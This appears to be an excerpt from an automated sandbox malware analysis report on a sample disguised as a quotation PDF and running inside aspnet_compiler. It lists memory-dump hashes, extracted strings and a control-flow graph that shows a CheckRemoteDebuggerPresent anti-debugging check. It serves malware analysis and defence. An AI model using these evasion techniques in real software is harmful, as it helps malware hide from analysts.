                                                    • Instruction ID: bc8d9dc79db39c914ec7f27c0d033d84c21d5252b6a7c24685ccaf4bb0688b92
                                                    • Opcode Fuzzy Hash: ba67cab923fe87596ecdf8642746855e1270e0e219ec06a358c1ecf15bf78f8d
                                                    • Instruction Fuzzy Hash: F7A14AB0D64259CFDB24CFA8D644BECBBF1BF09304F14816AD445AB2A6D7B94885CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68deb9179e53711bf93cf5bb893d7e9a870af84da44126a56a8c59d0ab1f4202
                                                    • Instruction ID: 9afcea02780cdb71cda6cd8fc27bb75309e6d942b9c448edbc1a253d780e049f
                                                    • Opcode Fuzzy Hash: 68deb9179e53711bf93cf5bb893d7e9a870af84da44126a56a8c59d0ab1f4202
                                                    • Instruction Fuzzy Hash: AB9172B0E0020D8FDF51DFA9D9917EEBBF2AF48314F24852AE419A7354EB349845CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58e36deef0f1772121711606cbf08e46bf372d3cdcf503092ac1857ceda05425
                                                    • Instruction ID: d3c9ceba04575429df505432b04cda79d152eb8295d988bb33999db8d90700a0
                                                    • Opcode Fuzzy Hash: 58e36deef0f1772121711606cbf08e46bf372d3cdcf503092ac1857ceda05425
                                                    • Instruction Fuzzy Hash: 88913AB0D64259CFDB20CFA9D648BECBBF5FB09304F149129D405AB6A6D7B84885CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                    • API String ID: 0-723292480
                                                    • Opcode ID: 5bdbaf5b390d344ff1b68ca79aa31fa063461e7c7049b7fd441f72b971054f83
                                                    • Instruction ID: 1cc92c69b92abb39fff5bba286f9ff14db9b5cd9b8088345685e0ad7aa5cba88
                                                    • Opcode Fuzzy Hash: 5bdbaf5b390d344ff1b68ca79aa31fa063461e7c7049b7fd441f72b971054f83
                                                    • Instruction Fuzzy Hash: 9B51A2B0A003059FCB08DB79845176EBBE6EFC8301F14886CD5499B296DF74AD4687A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_^q$(_^q$(_^q$(_^q
                                                    • API String ID: 0-2697572114
                                                    • Opcode ID: 5ca0a25edb8a4621286aaaecc8d7bfe4380ffef55315f4eed9987a7e5b2c9fc9
                                                    • Instruction ID: 8892146104ca2ed372e1d0f782f58a70c13e439d33a9c7b723070849f1504464
                                                    • Opcode Fuzzy Hash: 5ca0a25edb8a4621286aaaecc8d7bfe4380ffef55315f4eed9987a7e5b2c9fc9
                                                    • Instruction Fuzzy Hash: FD7128B5A142458FC7149F78C8554ADBFF2EF8A310B64446AD406DB392DB31DC85CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:7.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 12986 16370a8 12987 16370ec CheckRemoteDebuggerPresent 12986->12987 12988 163712e 12987->12988

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 442 16370a0-163712c CheckRemoteDebuggerPresent 445 1637135-1637170 442->445 446 163712e-1637134 442->446 446->445
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0163711F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2895182830.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1630000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID:
                                                    • API String ID: 3662101638-0
                                                    • Opcode ID: 4bc633b27a58175608fef4fef9d4a90147f0f58dd2f658eab4025e60c3cd2e42
                                                    • Instruction ID: 636a9b49dc6ab5cc47738f87f354bdca23e1072e536f95508d8182fddba7a97f
                                                    • Opcode Fuzzy Hash: 4bc633b27a58175608fef4fef9d4a90147f0f58dd2f658eab4025e60c3cd2e42
                                                    • Instruction Fuzzy Hash: 652148B28002598FDB14DF9AD885BEEFBF4EF49320F14841AE459A3391D778A944CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 449 16370a8-163712c CheckRemoteDebuggerPresent 451 1637135-1637170 449->451 452 163712e-1637134 449->452 452->451
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0163711F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2895182830.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1630000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID:
                                                    • API String ID: 3662101638-0
                                                    • Opcode ID: 6cd5553bad68c85f9033850b6bf3eed139d417e13317710eb676acf5bcfc57a2
                                                    • Instruction ID: 9f4db93904633b5c1bbf1010c01cdad2b6561e3cdc665b43904964f9f9ef1452
                                                    • Opcode Fuzzy Hash: 6cd5553bad68c85f9033850b6bf3eed139d417e13317710eb676acf5bcfc57a2
                                                    • Instruction Fuzzy Hash: 032159B18002598FCB10CF9AD844BEEFBF4EF49310F14841AE459A3350D738A944CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2893556991.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_125d000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5fa820e9a1cd8b0352e96c0410df39de074799b0b445c128bfcb30ff544a2f56
                                                    • Instruction ID: 3ababc0737ce4b08b1a3d80f07d3d280a834fb949547d72ff693a02a18ac1fec
                                                    • Opcode Fuzzy Hash: 5fa820e9a1cd8b0352e96c0410df39de074799b0b445c128bfcb30ff544a2f56
                                                    • Instruction Fuzzy Hash: 26210075614208DFDB55DF68D8C4B26BBA5EB84324F20C96DDD0A4B382C37AD807CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2893556991.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_125d000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d50e6c3d4a7adef7440d3914b61377eaf4d524ab0f7dc61d684e07876ab1096e
                                                    • Instruction ID: 77b76beb40fc9101403cf92d6d9a3d34e5ba91db28fade20a1749b560fcb23a9
                                                    • Opcode Fuzzy Hash: d50e6c3d4a7adef7440d3914b61377eaf4d524ab0f7dc61d684e07876ab1096e
                                                    • Instruction Fuzzy Hash: 29219A755093848FDB03CF24D9D4B15BF71EB46314F28C5EAD9498B2A7C33A980ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%